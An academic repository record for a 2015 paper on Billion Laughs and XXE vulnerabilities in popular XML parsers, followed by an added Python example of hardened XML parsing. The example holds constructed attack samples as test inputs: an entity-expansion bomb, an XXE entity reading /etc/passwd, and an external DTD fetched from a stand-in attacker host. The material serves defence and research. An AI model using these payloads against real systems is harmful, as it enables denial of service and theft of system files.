XML Vulnerabilities (Billion Laughs/BIL, XXE); XML Parsers; Security Testing
Abstract :
The Extensible Markup Language (XML) is extensively used in software systems and services. Various XML-based attacks, which may result in sensitive information leakage or denial of service, have been discovered and published. However, due to development time pressures and limited security expertise, such attacks are often overlooked in practice. In this paper, following a rigorous and extensive experimental process, we study the presence of two types of XML-based attacks, Billion Laughs (BIL) and XML External Entity (XXE), in 13 popular XML parsers. Furthermore, we investigate whether open-source systems that adopt a vulnerable XML parser apply any mitigation to prevent such attacks. Our objective is to provide clear and solid scientific evidence about the extent of the threat associated with such XML-based attacks and to discuss the implications of the obtained results. Our conclusion is that most of the studied parsers are vulnerable, and so are the systems that use them. Such strong evidence can be used to raise awareness among software developers and is a strong motivation for developers to provide security measures to thwart BIL and XXE attacks before deployment when adopting existing XML parsers.
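The abstract's closing point is that a system adopting an existing parser must add its own measures against BIL and XXE. The following is an added example, not code from the paper or from any of the parsers it studied, of what such a measure looks like in Python on top of the standard-library Expat binding: the policy refuses a DOCTYPE outright by default, and when a DTD is allowed it rejects external entities and external DTD subsets (XXE) and bounds every declared entity's expanded size statically, before the document body is ever parsed (BIL), plus a running budget on character data actually produced. The budgets, the exception and function names, and the sample documents are all constructed for illustration.

```python
"""Defensive XML loading against BIL and XXE (added example, not the paper's code).

Policy names, budgets and sample documents below are illustrative assumptions.
"""
import re
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXml(ValueError):
    """The document declares something the hardening policy rejects."""


_ENTITY_REF = re.compile(r"&([^;&#\s]+);")


def _expansion_size(name, entities, memo, stack):
    """Upper bound on the fully expanded length of entity `name`, computed from
    the replacement texts alone: nothing is actually expanded here."""
    if name in memo:
        return memo[name]
    if name in stack:
        raise UnsafeXml(f"recursive entity '{name}'")
    value = entities.get(name)
    if value is None:  # predefined (amp, lt, ...) or undeclared: a few chars at most
        return len(name) + 2
    stack.add(name)
    size, pos = 0, 0
    for m in _ENTITY_REF.finditer(value):
        size += m.start() - pos + _expansion_size(m.group(1), entities, memo, stack)
        pos = m.end()
    size += len(value) - pos
    stack.discard(name)
    memo[name] = size
    return size


def parse_xml(data, *, allow_dtd=False, max_entity_expansion=1 << 16, max_text=1 << 20):
    """Parse to an ElementTree Element under a hardening policy:
    - no DOCTYPE at all unless allow_dtd=True (the simplest mitigation);
    - with a DTD: no external DTD subset, no external entities (XXE), no
      parameter-entity fetching, and a static bound on each entity's expanded
      size (BIL), all enforced while the DTD is read, before the body;
    - a running bound on character data actually produced (BIL, defence in depth).
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    builder = ET.TreeBuilder()
    entities, produced = {}, [0]

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXml("DOCTYPE is not allowed")
        if system_id is not None or public_id is not None:
            raise UnsafeXml("external DTD subset is not allowed")

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            raise UnsafeXml(f"external entity '{name}' is not allowed (XXE)")
        if not is_param:
            entities[name] = value  # raw replacement text, references unexpanded
            size = _expansion_size(name, entities, {}, set())
            if size > max_entity_expansion:
                raise UnsafeXml(f"entity '{name}' would expand to {size} chars (BIL)")

    def char_data(text):
        produced[0] += len(text)
        if produced[0] > max_text:
            raise UnsafeXml("character data budget exceeded (BIL)")
        builder.data(text)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = char_data
    parser.Parse(data, True)  # a handler exception aborts parsing and propagates
    return builder.close()


def verdict(data, **policy):
    """'accepted' or 'rejected: <reason>' for a document under a policy."""
    try:
        parse_xml(data, **policy)
    except (UnsafeXml, expat.ExpatError) as exc:
        return f"rejected: {exc}"
    return "accepted"


# Constructed sample documents (not taken from the paper).
BILLION_LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>"""
XXE = b"""<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>"""
EXTERNAL_DTD = b"""<!DOCTYPE r SYSTEM "http://attacker.invalid/evil.dtd"><r/>"""
BENIGN_DTD = b"""<!DOCTYPE note [<!ENTITY company "Example Corp">]><note>&company;</note>"""
PLAIN = b"""<root a="1"><child>text</child></root>"""

if __name__ == "__main__":
    for label, doc in [("BIL", BILLION_LAUGHS), ("XXE", XXE), ("ext DTD", EXTERNAL_DTD),
                       ("benign DTD", BENIGN_DTD), ("plain", PLAIN)]:
        print(f"{label:10} default: {verdict(doc):45} allow_dtd: {verdict(doc, allow_dtd=True)}")
```

The static check is what makes the difference for BIL: the sample bomb is rejected at the declaration of lol5 (an estimated 300,000 characters against a 65,536 budget) without any entity having been expanded, which is independent of whether the underlying Expat build has its own amplification limit. The XXE sample and the external DTD subset are refused at declaration time as well, so no file or network access is ever attempted; parameter-entity parsing is switched off so that an external DTD is never fetched even when a DTD is allowed.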
Research center :
University of Luxembourg: SnT
Disciplines :
Computer science
Author, co-author :
Jan, Sadeeq ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT)
Nguyen, Duy Cu ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT)
Briand, Lionel ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT) ; University of Luxembourg > Faculty of Science, Technology and Communication (FSTC) > Computer Science and Communications Research Unit (CSC)
External co-authors :
no
Language :
English
Title :
Known XML Vulnerabilities Are Still a Threat to Popular Parsers and Open Source Systems
Publication date :
03 August 2015
Event name :
The 2015 IEEE International Conference on Software Quality, Reliability & Security
Event organizer :
IEEE Reliability Society
Event place :
Vancouver, Canada
Event date :
03-08-2015 to 05-08-2015
Audience :
International
Main work title :
The 2015 IEEE International Conference on Software Quality, Reliability & Security, Vancouver 3-5 August 2015
Peer reviewed :
Peer reviewed
Name of the research project :
Automated Security Testing for XML Vulnerabilities